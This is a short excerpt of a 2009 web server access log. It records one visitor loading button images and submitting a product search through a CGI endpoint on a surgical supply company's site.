86.96.229.86 - - [26/Jul/2009:04:55:59 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
86.96.229.86 - - [26/Jul/2009:04:55:59 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
86.96.229.86 - - [26/Jul/2009:04:56:00 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):lot HTTP/1.1" 200 38021 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
